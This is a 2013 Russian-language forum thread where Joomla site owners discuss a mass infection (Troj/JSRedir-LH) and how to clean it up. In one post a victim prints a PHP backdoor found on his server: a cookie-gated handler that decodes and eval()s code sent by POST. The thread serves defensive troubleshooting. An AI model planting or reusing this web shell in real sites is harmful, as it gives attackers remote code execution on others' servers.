X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

Открыть тему
Тема закрыта
> Внимание! Атака на сайты Joomla, вирус Troj/JSRedir-LH
Rapturious
Rapturious
Topic Starter сообщение 4.5.2013, 8:03; Ответить: Rapturious
Сообщение #1


Салют! Вчера Яндекс прислал письмецо, что сайт заражен. И вот сегодня под утро все таки выяснил в чем же дело

Внимание! Срочно обновите Joomla до последней версии 2.5.11! Обновите все установленные бесплатные расширения из каталога JED, особенно редакторы и компоненты (например формы контактов). Вчера была зафиксирована массовая атака на сайты Joomla. Сегодня уже начали поступать первые пострадавшие.

"Яндекс обнаружил на этом сайте вредоносный программный код, который может заразить ваш компьютер вирусом или получить доступ к вашей личной информации. Вредоносный код: содержит Troj/JSRedir-LH (по данным компании Sophos)."

Первые симптомы болезни: в начало каждого .js файла (можно начать проверку с каталога /media/system/js) дописывается вредоносный код, который содержит iframe на атакующий сайт. Источник.

Кто стал "счастливчиком" поделитесь методом борьбы (может кроме ай-болита есть еще методы) с этим чудовищем. В ручную все .js файлы долго вычищать.

Сообщение отредактировал Rapturious - 4.5.2013, 8:10
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
rus23kav
rus23kav
сообщение 4.5.2013, 9:03; Ответить: rus23kav
Сообщение #2


Зачем вычещать? Проще перезалить файлы движка и обновиться.


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
install
install
сообщение 4.5.2013, 9:40; Ответить: install
Сообщение #3


Уже весна на дворе.
Эта фигня еще в январе была запущена и большинство в том же январе залатало эти дырки и обновились.
Просыпайтесь smile.gif


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Rapturious
Rapturious
Topic Starter сообщение 4.5.2013, 9:44; Ответить: Rapturious
Сообщение #4


install,
Вчера Яндекс и разбудил.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Velleks
Velleks
сообщение 5.5.2013, 2:24; Ответить: Velleks
Сообщение #5


Самого затронула эта проблема, тоже интересует как почистить файлы.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
meefa
meefa
сообщение 5.5.2013, 3:08; Ответить: meefa
Сообщение #6


Вот здесь толково написано как удалить вирус: http://fstrange.ru/coder/php/joomla-udalenie-virusov.html
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
mitrokov
mitrokov
сообщение 6.5.2013, 16:54; Ответить: mitrokov
Сообщение #7


У себя обнаружил кучу левых файлов вида 0a41ed3.php размещаются файлы во всех папках и подкапках сайта, заметил два вида содержимого
первый:
CODE
<?php echo "#!!#";

второй :
CODE
<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
echo '<textarea id=areatext>';
eval($msg);
echo '</textarea>bg';
exit;
}}
?>


Если кто разбирается может разъясните что эт за фигня такая.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Rapturious
Rapturious
Topic Starter сообщение 6.5.2013, 16:59; Ответить: Rapturious
Сообщение #8


mitrokov,
это и есть вирус Joomla удаление вирусов

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой
или обратитесь к любому из модераторов.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыАтака ботов на сайт
32 mspcontent 2633 9.5.2021, 18:39
автор: Latinos
Открытая тема (нет новых ответов) Интересуют EN сайты 5-10 страниц.
5 Solomoni 804 1.5.2021, 17:50
автор: ViktoriaFE
Горячая тема (нет новых ответов) Атака клонов! Или как бороться с мультиаккаунтами.
123 Pelican_Program 36735 22.4.2021, 23:01
автор: Pelican_Program
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыСтоит ли создавать сайты на украинском языке?
54 mspcontent 2944 20.4.2021, 20:28
автор: DUbiev
Открытая тема (нет новых ответов) Разработка сайтов под ключ! Landing Page, Сайты, Магазины.
7 M-seo 3879 11.4.2021, 23:51
автор: M-seo


 



RSS Текстовая версия Сейчас: 11.5.2021, 13:36
Дизайн